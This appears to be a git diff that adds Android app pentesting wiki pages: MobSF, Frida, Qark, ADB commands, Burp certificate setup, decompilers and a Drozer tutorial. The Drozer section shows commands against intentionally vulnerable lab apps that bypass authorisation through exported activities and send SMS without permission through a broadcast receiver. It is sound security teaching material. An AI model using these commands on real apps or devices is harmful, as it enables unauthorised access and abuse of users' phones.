+* **Dump application data** \(URLs, logs, clipboard, screenshots made by you, screenshots made by "**Exported Activity Tester**", emails, SQLite databases, XML files, and other created files\). All of this is done automatically except for the screenshots, you need to press when you want a screenshot or you need to press "**Exported Activity Tester**" to obtain screenshots of all the exported activities.
+* Capture **HTTPS traffic**
+* Use **Frida** to obtain **runtime** **information**
+
+From android **versions &gt; 5**, it will **automatically start Friday** and will set global **proxy** settings to **capture** traffic. It will only capture traffic from the tested application.
+
+**Frida**
+
+By default, it will also use some Frida Scripts to **bypass SSL pinning**, **root detection** and **debugger detection** and to **monitor interesting APIs**.  
+MobSF can also **invoke exported activities**, grab **screenshots** of them and **save** them for the report.
+
+To **start** the dynamic testing press the green bottom: "**Start Instrumentation**". Press the "**Frida Live Logs**" to see the logs generated by the Frida scripts and "**Live API Monitor**" to see all the invocation to hooked methods, arguments passed and returned values \(this will appear after pressing "Start Instrumentation"\).  
+MobSF also allows you to load your own **Frida scripts \(**to send the results of your Friday scripts to MobSF use the function `send()`\). It also has **several pre-written scripts** you can load \(you can add more in `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`\), just **select them**, press "**Load**" and press "**Start Instrumentation**" \(you will be able to see the logs of that scripts inside "**Frida Live Logs**"\).
+
+![](../../.gitbook/assets/image%20%28187%29.png)
+
+Moreover, you have some Auxiliary Frida functionalities:
+
+* **Enumerate Loaded Classes**: It will print all the loaded classes
+* **Capture Strings**: It will print all the capture strings while using the application \(super noisy\)
+* **Capture String Comparisons**: Could be very useful. It will **show the 2 strings being compared** and if the result was True or False.
+* **Enumerate Class Methods**: Put the class name \(like "java.io.File"\) and it will print all the methods of the class.
+* **Search Class Pattern**:  Search classes by pattern
+* **Trace Class Methods**: **Trace** a **whole class** \(see inputs and outputs of all methods of th class\). Remember that by default MobSF traces several interesting Android Api methods.
+
+Once you have selected the auxiliary module you want to use you need to press "**Start Intrumentation**" and you will see all the outputs in "**Frida Live Logs**".
+
+**Shell**
+
+Mobsf also brings you a shell with some **adb** commands, **MobSF commands**, and common **shell** **commands** at the bottom of the dynamic analysis page. Some interesting commands:
+
+```text
+help
+shell ls
+activities
+exported_activities
+services
+receivers
+```
+
+**HTTP tools**
+
+When http traffic is capture you can see an ugly view of the captured traffic on "**HTTP\(S\) Traffic**" bottom or a nicer view in "**Start HTTPTools**" green bottom. From the second option, you can **send** the **captured requests** to **proxies** like Burp or Owasp ZAP.  
+To do so, _power on Burp --&gt;_ _turn off Intercept --&gt; in MobSB HTTPTools select the request_ --&gt; press "**Send to Fuzzer**" --&gt; _select the proxy address_ \(http://127.0.0.1:8080\).
+
+Once you finish the dynamic analysis with MobSF you can press on "**Start Web API Fuzzer**" to **fuzz http requests** an look for vulnerabilities.
+
+{% hint style="info" %}
+After performing a dynamic analysis with MobSF the proxy settings me be misconfigured and you won't be able to fix them from the GUI. You can fix the proxy settings by doing:
+
+```text
+adb shell settings put global http_proxy :0
+```
+{% endhint %}
+
+### [Qark](https://github.com/linkedin/qark)
+
+This tool is designed to look for several **security related Android application vulnerabilities**, either in **source code** or **packaged APKs**. The tool is also **capable of creating a "Proof-of-Concept" deployable APK** and **ADB commands**, to exploit some of the found vulnerabilities \(Exposed activities, intents, tapjacking...\). As with Drozer, there is no need to root the test device.
+
+```bash
+pip3 install --user qark  # --user is only needed if not using a virtualenv
+qark --apk path /to/my.apk
+qark --java path/to/parent/java/folder
+qark --java path/to/specific/java/file.java
+```
+
+### [**ReverseAPK**](https://github.com/1N3/ReverseAPK.git)
+
+* Displays all extracted files for easy reference
+* Automatically decompile APK files to Java and Smali format
+* Analyze AndroidManifest.xml for common vulnerabilities and behavior
+* Static source code analysis for common vulnerabilities and behavior
+  * Device info
+  * Intents
+  * Command execution
+  * SQLite references
+  * Logging references
+  * Content providers
+  * Broadcast recievers
+  * Service references
+  * File references
+  * Crypto references
+  * Hardcoded secrets
+  * URL's
+  * Network connections
+  * SSL references
+  * WebView references
+
+```text
+reverse-apk relative/path/to/APP.apk
+```
+
+### [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super)
+
+SUPER is a command-line application that can be used in Windows, MacOS X and Linux, that analyzes _.apk_ files in search for vulnerabilities. It does this by decompressing APKs and applying a series of rules to detect those vulnerabilities.
+
+All rules are centered in a `rules.json` file, and each company or tester could create its own rules to analyze what they need.
+
+Download the latest binaries from in the [download page](https://superanalyzer.rocks/download.html)
+
+```text
+super-analyzer {apk_file}
+```
+
+### [StaCoAn](https://github.com/vincentcox/StaCoAn)
+
+![](../../.gitbook/assets/image%20%28303%29.png)
+
+StaCoAn is a **crossplatform** tool which aids developers, bugbounty hunters and ethical hackers performing [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) on mobile applications\*.
+
+The concept is that you drag and drop your mobile application file \(an .apk or .ipa file\) on the StaCoAn application and it will generate a visual and portable report for you. You can tweak the settings and wordlists to get a customized experience.
+
+Download[ latest release](https://github.com/vincentcox/StaCoAn/releases): 
+
+```text
+./stacoan
+```
+
+### [AndroBugs](https://github.com/AndroBugs/AndroBugs_Framework)
+
+AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications.  
+[Windows releases](https://github.com/AndroBugs/AndroBugs_Framework/releases)
+
+```text
+python androbugs.py -f [APK file]
+androbugs.exe -f [APK file]
+```
+
+### [Androwarn](https://github.com/maaaaz/androwarn)
+
+**Androwarn** is a tool whose main aim is to detect and warn the user about potential malicious behaviours developped by an Android application.
+
+The detection is performed with the **static analysis** of the application's Dalvik bytecode, represented as **Smali**, with the [`androguard`](https://github.com/androguard/androguard) library.
+
+This tool looks for **common behavior of "bad" applications** like: Telephony identifiers exfiltration, Audio/video flow interception, PIM data modification, Arbitrary code execution...
+
+```text
+python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
+```
+
+### [MARA Framework](https://github.com/xtiankisutsa/MARA_Framework)
+
+![](../../.gitbook/assets/image%20%2810%29.png)
+
+**MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. It is a tool that puts together commonly used mobile application reverse engineering and analysis tools, to assist in testing mobile applications against the OWASP mobile security threats. Its objective is to make this task easier and friendlier to mobile application developers and security professionals.
+
+It is able to:
+
+* Extract Java and Smali code using different tools
+* Analyze APKs using: [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD)
+* Extract private information from the APK using regexps.
+* Analyze the Manifest.
+* Analyze found domains using: [pyssltest](https://github.com/moheshmohan/pyssltest), [testssl](https://github.com/drwetter/testssl.sh) and [whatweb](https://github.com/urbanadventurer/WhatWeb)
+* Deobfuscate APK via [apk-deguard.com](http://www.apk-deguard.com/)
+
+### Koodous
+
+Useful to detect malware: [https://koodous.com/](https://koodous.com/)
+
+## Obfuscating/Deobfuscating code
+
+### [ProGuard](https://en.wikipedia.org/wiki/ProGuard_%28software%29)
+
+**ProGuard** is an open source command-line tool that shrinks, optimizes and obfuscates Java code. It is able to optimize bytecode as well as detect and remove unused instructions. ProGuard is free software and is distributed under the GNU General Public License, version 2.
+
+ProGuard is distributed as part of the Android SDK and runs when building the application in release mode.
+
+From: [https://en.wikipedia.org/wiki/ProGuard\_\(software\)](https://en.wikipedia.org/wiki/ProGuard_%28software%29)
+
+### [DeGuard](http://apk-deguard.com/)
+
+#### DeGuard reverses the process of obfuscation performed by Android obfuscation tools. This enables numerous security analyses, including code inspection and predicting libraries.
+
+You can upload an obfuscated APK to their platform.
+
+### [Simplify](https://github.com/CalebFenton/simplify)
+
+It is a **generic android deobfuscator.** Simplify **virtually executes an app** to understand its behavior and then **tries to optimize the code** so it behaves identically but is easier for a human to understand. Each optimization type is simple and generic, so it doesn't matter what the specific type of obfuscation is used.
+
+### [APKiD](https://github.com/rednaga/APKiD)
+
+APKiD gives you information about **how an APK was made**. It identifies many **compilers**, **packers**, **obfuscators**, and other weird stuff. It's [_PEiD_](https://www.aldeid.com/wiki/PEiD) for Android.
+
+### Manual
+
+[Read this tutorial to learn some tricks on **how to reverse custom obfuscation**](manual-deobfuscation.md)\*\*\*\*
+
+## Labs
+
+### [Androl4b](https://github.com/sh4hin/Androl4b)
+
+AndroL4b is an Android security virtual machine based on ubuntu-mate includes the collection of latest framework, tutorials and labs from different security geeks and researchers for reverse engineering and malware analysis.
+
+### OWASP
+
+{% embed url="https://github.com/OWASP/owasp-mstg%0Ahttps://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication" %}
+
+### Git Repos
+
+[https://github.com/riddhi-shree/nullCommunity/tree/master/Android](https://github.com/riddhi-shree/nullCommunity/tree/master/Android)
+
+## References
+
+For more information visit:
+
+* [https://appsecwiki.com/\#/](https://appsecwiki.com/#/) It is a great list of resources
+* [https://maddiestone.github.io/AndroidAppRE/](https://maddiestone.github.io/AndroidAppRE/) Android quick course
+* [https://manifestsecurity.com/android-application-security/](https://manifestsecurity.com/android-application-security/)
+* [https://github.com/ivRodriguezCA/RE-iOS-Apps/](https://github.com/ivRodriguezCA/RE-iOS-Apps/) IOS free course\([https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/](https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/)\)
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/adb-commands.md b/mobile-apps-pentesting/android-app-pentesting/adb-commands.md
new file mode 100644
index 00000000..19a22ef2
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/adb-commands.md
@@ -0,0 +1,352 @@
+# ADB Commands
+
+**Information obtained from:** [**http://adbshell.com/**](http://adbshell.com/)\*\*\*\*
+
+## Connection
+
+```text
+adb devices
+```
+
+This will list the connected devices; if "_**unathorised**_" appears, this means that you have to **unblock** your **mobile** and **accept** the connection.
+
+This indicates to the device that it has to start and adb server in port 5555:
+
+```text
+adb tcpip 5555
+```
+
+Connect to that IP and that Port:
+
+```text
+adb connect <IP>:<PORT>
+```
+
+If you get an error like the following in a Virtual Android software \(like Genymotion\):
+
+```text
+adb server version (41) doesn't match this client (36); killing...
+```
+
+It's because you are trying to connect to an ADB server with a different version. Just try to find the adb binary the software is using \(go to `C:\Program Files\Genymobile\Genymotion` and search for adb.exe\)
+
+## Packet Manager
+
+### Install/Uninstall
+
+#### adb install \[option\] &lt;path&gt;
+
+```text
+adb install test.apk
+```
+
+```text
+adb install -l test.apk forward lock application
+```
+
+```text
+adb install -r test.apk replace existing application
+```
+
+```text
+adb install -t test.apk allow test packages
+```
+
+```text
+adb install -s test.apk install application on sdcard
+```
+
+```text
+adb install -d test.apk allow version code downgrade
+```
+
+```text
+adb install -p test.apk partial application install
+```
+
+#### adb uninstall \[options\] &lt;PACKAGE&gt;
+
+```text
+adb uninstall com.test.app
+```
+
+```text
+adb uninstall -k com.test.app Keep the data and cache directories around after package removal.
+```
+
+### Packages
+
+Prints all packages, optionally only those whose package name contains the text in &lt;FILTER&gt;.
+
+#### adb shell pm list packages \[options\] &lt;FILTER-STR&gt;
+
+```text
+adb shell pm list packages <FILTER-STR>
+```
+
+```text
+adb shell pm list packages -f <FILTER-STR> #See their associated file.
+```
+
+```text
+adb shell pm list packages -d <FILTER-STR> #Filter to only show disabled packages.
+```
+
+```text
+adb shell pm list packages -e <FILTER-STR> #Filter to only show enabled packages.
+```
+
+```text
+adb shell pm list packages -s <FILTER-STR> #Filter to only show system packages.
+```
+
+```text
+adb shell pm list packages -3 <FILTER-STR> #Filter to only show third party packages.
+```
+
+```text
+adb shell pm list packages -i <FILTER-STR> #See the installer for the packages.
+```
+
+```text
+adb shell pm list packages -u <FILTER-STR> #Also include uninstalled packages.
+```
+
+```text
+adb shell pm list packages --user <USER_ID> <FILTER-STR> #The user space to query.
+```
+
+#### adb shell pm path &lt;PACKAGE&gt;
+
+Print the path to the APK of the given .
+
+```text
+adb shell pm path com.android.phone
+```
+
+#### adb shell pm clear &lt;PACKAGE&gt;
+
+Delete all data associated with a package.
+
+```text
+adb shell pm clear com.test.abc
+```
+
+## File Manager
+
+#### adb pull &lt;remote&gt; \[local\]
+
+Download a specified file from an emulator/device to your computer.
+
+```text
+adb pull /sdcard/demo.mp4 ./
+```
+
+#### adb push &lt;local&gt; &lt;remote&gt;
+
+Upload a specified file from your computer to an emulator/device.
+
+```text
+adb push test.apk /sdcard
+```
+
+## Screencapture/Screenrecord
+
+#### adb shell screencap &lt;filename&gt;
+
+Taking a screenshot of a device display.
+
+```text
+adb shell screencap /sdcard/screen.png
+```
+
+#### adb shell screenrecord \[options\] &lt;filename&gt;
+
+Recording the display of devices running Android 4.4 \(API level 19\) and higher.
+
+```text
+adb shell screenrecord /sdcard/demo.mp4
+adb shell screenrecord --size <WIDTHxHEIGHT>
+adb shell screenrecord --bit-rate <RATE>
+adb shell screenrecord --time-limit <TIME> #Sets the maximum recording time, in seconds. The default and maximum value is 180 (3 minutes).
+adb shell screenrecord --rotate # Rotates 90 degrees
+adb shell screenrecord --verbose
+```
+
+\(press Ctrl-C to stop recording\)
+
+**You can download the files \(images and videos\) using** _**adb pull**_
+
+## Shell
+
+#### adb shell
+
+Get a shell inside the device
+
+```text
+adb shell
+```
+
+#### adb shell &lt;CMD&gt;
+
+Execute a command inside the device
+
+```text
+adb shell ls
+```
+
+## Processes
+
+If you want to get the PID of the process of your application you can execute:
+
+```text
+adb shell ps
+```
+
+And search for your application
+
+Or you can do
+
+```text
+adb shell pidof com.your.application
+```
+
+And it will print the PID of the application
+
+## System
+
+```text
+adb root
+```
+
+Restarts the adbd daemon with root permissions. Then, you have to conenct again to the ADB server and you will be root \(if available\)
+
+```text
+adb sideload <update.zip>
+```
+
+flashing/restoring Android update.zip packages.
+
+## Logs
+
+### Logcat
+
+To **filter the messages of only one application**, get the PID of the application and use grep \(linux/macos\) or findstr \(windows\) to filter the output of logcat:
+
+```text
+adb logcat | grep 4526
+adb logcat | findstr 4526
+```
+
+#### adb logcat \[option\] \[filter-specs\]
+
+```text
+adb logcat
+```
+
+Notes: press Ctrl-C to stop monitor
+
+```text
+adb logcat *:V lowest priority, filter to only show Verbose level
+```
+
+```text
+adb logcat *:D filter to only show Debug level
+```
+
+```text
+adb logcat *:I filter to only show Info level
+```
+
+```text
+adb logcat *:W filter to only show Warning level
+```
+
+```text
+adb logcat *:E filter to only show Error level
+```
+
+```text
+adb logcat *:F filter to only show Fatal level
+```
+
+```text
+adb logcat *:S Silent, highest priority, on which nothing is ever printed
+```
+
+#### adb logcat -b &lt;Buffer&gt;
+
+```text
+adb logcat -b radio View the buffer that contains radio/telephony related messages.
+```
+
+```text
+adb logcat -b event View the buffer containing events-related messages.
+```
+
+```text
+adb logcat -b main default
+```
+
+```text
+adb logcat -c Clears the entire log and exits.
+```
+
+```text
+adb logcat -d Dumps the log to the screen and exits.
+```
+
+```text
+adb logcat -f test.logs Writes log message output to test.logs .
+```
+
+```text
+adb logcat -g Prints the size of the specified log buffer and exits.
+```
+
+```text
+adb logcat -n <count> Sets the maximum number of rotated logs to <count>. 
+```
+
+### dumpsys
+
+dumps system data
+
+#### adb shell dumpsys \[options\]
+
+```text
+adb shell dumpsys
+```
+
+adb shell dumpsys meminfo
+
+```text
+adb shell dumpsys battery
+```
+
+Notes: A mobile device with Developer Options enabled running Android 5.0 or higher.
+
+```text
+adb shell dumpsys batterystats collects battery data from your device
+```
+
+Notes: [Battery Historian](https://github.com/google/battery-historian) converts that data into an HTML visualization. **STEP 1** _adb shell dumpsys batterystats &gt; batterystats.txt_ **STEP 2** _python historian.py batterystats.txt &gt; batterystats.html_
+
+```text
+adb shell dumpsys batterystats --reset erases old collection data
+```
+
+adb shell dumpsys activity
+
+## Backup
+
+Backup an android device from adb.
+
+```bash
+adb backup [-apk] [-shared] [-system] [-all] -f file.backup
+# -apk -- Include APK from Third partie's applications
+# -shared -- Include removable storage
+# -system -- Include system Applciations
+# -all -- Include all the applications
+```
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md b/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md
new file mode 100644
index 00000000..61873124
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md
@@ -0,0 +1,70 @@
+# Burp Suite Configuration for Android
+
+**This tutorial was taken from:** [**https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533**](https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533)\*\*\*\*
+
+## Add a proxy in Burp Suite to listen.
+
+Address: **192.168.56.1** & Port: **1337**
+
+Choose _**All Interfaces**_ option.
+
+![](https://miro.medium.com/max/700/1*0Bn7HvqI775Nr5fXGcqoJA.png)
+
+## **Adding listener in Android device.**
+
+Setting → Wifi →WiredSSID \(Long press\)
+
+Choose Modify network → Check Advance options.
+
+Select Proxy to the manual
+
+![](https://miro.medium.com/max/700/1*gkDuYqWMldFuYguQuID7sw.png)
+
+Testing connection over http and https using devices browser.
+
+1. http:// \(working\) tested — [http://ehsahil.com](http://ehsahil.com/)
+
+![](https://miro.medium.com/max/700/1*LJ2uhK2JqKYY_wYkH3jwbw.png)
+
+2. https:// certificate error — https://google.com
+
+![](https://miro.medium.com/max/700/1*M-AoG6Yqo21D9qgQHLCSzQ.png)
+
+## **Installing burp certificate in android device.**
+
+Download burp certificate. — Use your desktop machine to download the certificate.
+
+[https://burp](http://burp/)
+
+![](https://miro.medium.com/max/700/1*f4LjnkNs7oA1f4XokEeiTw.png)
+
+Click on **CA certificate download the certificate.**
+
+The downloaded certificate is in cacert.der extension and Android 5.\* does not recognise it as certificate file.
+
+You can download the cacert file using your desktop machine and rename it from cacert.der to cacert.crt and drop it on Android device and certificate will be automatically added into **file:///sd\_card/downloads.**
+
+**Installing the downloaded certificate.**
+
+Settings →Security →Install certificate from SD cards
+
+Now, goto: sdcard →Downloads → Select cacert.crt
+
+Now, Name it as anything “portswigger”
+
+![](https://miro.medium.com/max/700/1*lDtlQ1FfcHEytrSZNvs2Mw.png)
+
+You also need to setup the PIN before adding certificate. Verifying the installed certificate using trusted certificates.
+
+Trusted certificates →Users
+
+![](https://miro.medium.com/max/700/1*dvEffIIS0-dPE6q3ycFx3Q.png)
+
+After installing Certificate SSL endpoints also working fine tested using → [https://google.com](https://google.com/)
+
+![](https://miro.medium.com/max/700/1*lt0ZvZH60HI0ud1eE9jAnA.png)
+
+{% hint style="info" %}
+After installing the certificate this way Firefox for Android won't use it \(based on my tests\), so use a different browser.
+{% endhint %}
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md b/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md
new file mode 100644
index 00000000..9d989ce0
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md
@@ -0,0 +1,48 @@
+# APK decompilers
+
+### [JD-Gui](https://github.com/java-decompiler/jd-gui)
+
+First famous gui Java decompiler, you could use it to investigate the Java code from the APK once you have obtained it.
+
+### [Jadx](https://github.com/skylot/jadx)
+
+Buildin Java \(multi-platform\)and at this moment I think it's the recommended one.  
+Just **download** the **latest** version and execute it from the _**bin**_ folder:
+
+```text
+jadx-gui
+```
+
+Using the GUI you can perform **text search**, go to the **functions definitions** \(_CTRL + left click_ on the function\) and cross refs \(_right click_ --&gt; _Find Usage_\)
+
+If you **only want** the **java code** but without using a GUI a very easy way is to use the jadx cli tool:
+
+```text
+jadx app.apk
+```
+
+Some **interesting options of jadx** \(GUI and CLI versions\) are:
+
+```text
+-d <path to output dir>
+--no-res #No resources
+--no-src #No source code
+--no-imports #Always write entire package name (very useful to know where is the function that you might want to hook)
+```
+
+### [GDA-android-reversing-Tool](https://github.com/charles2gan/GDA-android-reversing-Tool)
+
+Looks faster than JD-Gui, It probides more information \(MalScan, Strings...\) and same interesting capabilities: X-refs, go to functions definitions...  
+But it's only available for Windows.
+
+![](../../.gitbook/assets/image%20%28207%29.png)
+
+### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)
+
+Another **interesting tool to make a Static analysis is**: [**bytecode-viewer**](https://github.com/Konloch/bytecode-viewer/releases)**.** It allows you to decompile the APK using **several decompilers at the same time**. Then, you can see for example, 2 different Java decompilers and one Smali decompiler. It allows you also to **modify** the code:
+
+![](../../.gitbook/assets/image%20%28265%29.png)
+
+If you modify the code, then you can **export it**.  
+One bad thing of bytecode-viewer is that it **doesn't have references** or **cross-references.**
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/README.md b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/README.md
new file mode 100644
index 00000000..095de00d
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/README.md
@@ -0,0 +1,303 @@
+# Drozer Tutorial
+
+## APKs to test
+
+* [Sieve](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) \(from mrwlabs\)
+* [DIVA](https://payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz)
+
+## Installation
+
+Install Drozer Client inside your host. Download it from the [latest releases](https://github.com/mwrlabs/drozer/releases).
+
+```bash
+pip install drozer-2.4.4-py2-none-any.whl
+pip install twisted
+pip install service_identity
+```
+
+Download and install drozer APK from the [latest releases](https://github.com/mwrlabs/drozer/releases). At this moment it is [this](https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk).
+
+```text
+adb install drozer.apk
+```
+
+### Starting the Server
+
+Agent is running on port 31415, we need to [port forward](https://en.wikipedia.org/wiki/Port_forwarding) to establish the communication between the Drozer Client and Agent, here is the command to do so:
+
+```text
+adb forward tcp:31415 tcp:31415
+```
+
+Finally, **launch** the **application** and press the bottom "**ON**"
+
+![](../../../.gitbook/assets/image%20%28193%29.png)
+
+And connect to it:
+
+```text
+drozer console connect
+```
+
+## Interesting Commands
+
+| **Commands** | **Description** |
+| :--- | :--- |
+| **Help MODULE** | Shows help of the selected module |
+| **list** | Shows a list of all drozer modules that can be executed in the current session. This hides modules that you don’t have appropriate permissions to run. |
+| **shell** | Start an interactive Linux shell on the device, in the context of the Agent. |
+| **clean** | Remove temporary files stored by drozer on the Android device. |
+| **load** | Load a file containing drozer commands and execute them in sequence. |
+| **module** | Find and install additional drozer modules from the Internet. |
+| **unset** | Remove a named variable that drozer passes to any Linux shells that it spawns. |
+| **set** | Stores a value in a variable that will be passed as an environmental variable to any Linux shells spawned by drozer. |
+| **shell** | Start an interactive Linux shell on the device, in the context of the Agent |
+| **run MODULE** | Execute a drozer module |
+| **exploit** | Drozer can create exploits to execute in the decide. `drozer exploit list` |
+| **payload** | The exploits need a payload. `drozer payload list` |
+
+### Package
+
+Find the **name** of the package filtering by part of the name:
+
+```text
+dz> run app.package.list -f sieve  
+com.mwr.example.sieve
+```
+
+**Basic Information** of the package:
+
+```text
+dz> run app.package.info -a com.mwr.example.sieve
+Package: com.mwr.example.sieve
+Process Name: com.mwr.example.sieve
+Version: 1.0
+Data Directory: /data/data/com.mwr.example.sieve
+APK Path: /data/app/com.mwr.example.sieve-2.apk
+UID: 10056
+GID: [1028, 1015, 3003]
+Shared Libraries: null
+Shared User ID: null
+Uses Permissions:
+ - android.permission.READ_EXTERNAL_STORAGE
+ - android.permission.WRITE_EXTERNAL_STORAGE
+ - android.permission.INTERNET
+Defines Permissions:
+ - com.mwr.example.sieve.READ_KEYS
+ - com.mwr.example.sieve.WRITE_KEYS
+```
+
+Read **Manifest**:
+
+```text
+run.package.manifest jakhar.aseem.diva
+```
+
+**Attack surface** of the package:
+
+```text
+dz> run app.package.attacksurface com.mwr.example.sieve
+Attack Surface:
+ 3 activities exported
+ 0 broadcast receivers exported
+ 2 content providers exported
+ 2 services exported
+ is debuggable
+```
+
+* **Activities**: Maybe you can start an activity and bypass some kind of authorization that should be prevent you from launching it.
+* **Content providers**: Maybe you can access private dato or exploit some vulnerability \(SQL Injection or Path Traversal\).
+* **Services**:
+* **is debuggable**: [Learn more](./#is-debuggeable)
+
+### Activities
+
+An exported activity  component’s “android:exported” value is set to **“true”** in the AndroidManifest.xml file:
+
+```markup
+<activity android:name="com.my.app.Initial" android:exported="true">
+</activity>
+```
+
+**List exported activities**:
+
+```text
+dz> run app.activity.info -a com.mwr.example.sieve
+Package: com.mwr.example.sieve
+ com.mwr.example.sieve.FileSelectActivity
+ com.mwr.example.sieve.MainLoginActivity
+ com.mwr.example.sieve.PWList
+```
+
+**Start activity**:
+
+Maybe you can start an activity and bypass some kind of authorization that should be prevent you from launching it.
+
+```text
+dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
+```
+
+You can also start an exported activity from **adb**:
+
+* PackageName is com.example.demo
+* Exported ActivityName is com.example.test.MainActivity
+
+```text
+adb shell am start -n com.example.demo/com.example.test.MainActivity
+```
+
+### Content Providers
+
+This post was so big to be here so **you can** [**access it in its own page here**](exploiting-content-providers.md).
+
+### Services
+
+A exported service is declared inside the Manifest.xml:
+
+```markup
+<service android:name=".AuthService" android:exported="true" android:process=":remote"/>
+```
+
+Inside the code **check** for the **`handleMessage`**function which will **receive** the **message**:
+
+![](../../../.gitbook/assets/image%20%28225%29.png)
+
+#### List service
+
+```text
+dz> run app.service.info -a com.mwr.example.sieve 
+Package: com.mwr.example.sieve
+  com.mwr.example.sieve.AuthService
+    Permission: null
+  com.mwr.example.sieve.CryptoService
+    Permission: null
+```
+
+#### **Interact** with a service
+
+```text
+app.service.send            Send a Message to a service, and display the reply  
+app.service.start           Start Service                                       
+app.service.stop            Stop Service
+```
+
+#### Example
+
+Take a look to the **drozer** help for `app.service.send`:
+
+![](../../../.gitbook/assets/image%20%2830%29.png)
+
+Note that you will be sending first the data inside "_msg.what_", then "_msg.arg1_" and "_msg.arg2_", you should check inside the code **which information is being used** and where.   
+Using the `--extra` option you can send something interpreted by "_msg.replyTo"_, and using `--bundle-as-obj` you create and object with the provided details.
+
+In the following example:
+
+* `what == 2354`
+* `arg1 == 9234`
+* `arg2 == 1`
+* `replyTo == object(string com.mwr.example.sieve.PIN 1337)`
+
+```text
+run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 1 --extra string com.mwr.example.sieve.PIN 1337 --bundle-as-obj
+```
+
+![](../../../.gitbook/assets/image%20%28293%29.png)
+
+### Broadcast Receivers
+
+Android apps can send or receive broadcast messages from the Android system and other Android apps, similar to the [publish-subscribe](https://en.wikipedia.org/wiki/Publish%E2%80%93subscribe_pattern) design pattern. These broadcasts are sent when an event of interest occurs. For example, the Android system sends broadcasts when various system events occur, such as when the system boots up or the device starts charging. Apps can also send custom broadcasts, for example, to notify other apps of something that they might be interested in \(for example, some new data has been downloaded\).
+
+Apps can register to receive specific broadcasts. When a broadcast is sent, the system automatically routes broadcasts to apps that have subscribed to receive that particular type of broadcast.
+
+This could appear inside the Manifest.xml file:
+
+```markup
+<receiver android:name=".MyBroadcastReceiver"  android:exported="true">
+    <intent-filter>
+        <action android:name="android.intent.action.BOOT_COMPLETED"/>
+        <action android:name="android.intent.action.INPUT_METHOD_CHANGED" />
+    </intent-filter>
+</receiver>
+```
+
+From: [https://developer.android.com/guide/components/broadcasts](https://developer.android.com/guide/components/broadcasts)
+
+After discovering this Broadcast Receivers you should **check the code** of them. Pay special attention to the **`onReceive`**function as it will be handling the messages received.
+
+#### **Detect all** broadcast receivers
+
+```bash
+run app.broadcast.info #Detects all
+```
+
+#### Check broadcast receivers of an app
+
+```bash
+#Check one negative
+run app.broadcast.info -a jakhar.aseem.diva
+Package: jakhar.aseem.diva
+  No matching receivers.
+
+# Check one positive
+run app.broadcast.info -a com.google.android.youtube
+Package: com.google.android.youtube
+  com.google.android.libraries.youtube.player.PlayerUiModule$LegacyMediaButtonIntentReceiver
+    Permission: null
+  com.google.android.apps.youtube.app.common.notification.GcmBroadcastReceiver
+    Permission: com.google.android.c2dm.permission.SEND
+  com.google.android.apps.youtube.app.PackageReplacedReceiver
+    Permission: null
+  com.google.android.libraries.youtube.account.AccountsChangedReceiver
+    Permission: null
+  com.google.android.apps.youtube.app.application.system.LocaleUpdatedReceiver
+    Permission: null
+```
+
+#### Broadcast **Interactions**
+
+```text
+app.broadcast.info          Get information about broadcast receivers           
+app.broadcast.send          Send broadcast using an intent                      
+app.broadcast.sniff         Register a broadcast receiver that can sniff particular intents
+```
+
+#### Send a message
+
+In this example abusing the [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) Content Provider you can **send an arbitrary SMS** any non-premium destination **without asking** the user for permission.
+
+![](../../../.gitbook/assets/image%20%28237%29.png)
+
+![](../../../.gitbook/assets/image%20%28110%29.png)
+
+If you read the code, the parameters "_phoneNumber_" and "_message_" must be sent to the Content Provider.
+
+```text
+run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers SendSMSNowReceiver --extra string phoneNumber 123456789 --extra string message "Hello mate!"
+```
+
+### Is debuggeable
+
+A prodduction APK should never be debuggeable.  
+This mean that you can **attach java debugger** to the running application, inspect it in run time, set breakpoints, go step by step, gather variable values and even change them.[ InfoSec institute has an excellent article](../exploiting-a-debuggeable-applciation.md) on digging deeper when you application is debuggable and injecting runtime code. 
+
+When an application is debuggable, it will appear in the Manifest:
+
+```text
+<application theme="@2131296387" debuggable="true"
+```
+
+You can find all debuggeable applications with **Drozer**:
+
+```text
+run app.package.debuggable
+```
+
+## Tutorials
+
+* [https://resources.infosecinstitute.com/android-penetration-tools-walkthrough-series-drozer/\#gref](https://resources.infosecinstitute.com/android-penetration-tools-walkthrough-series-drozer/#gref)
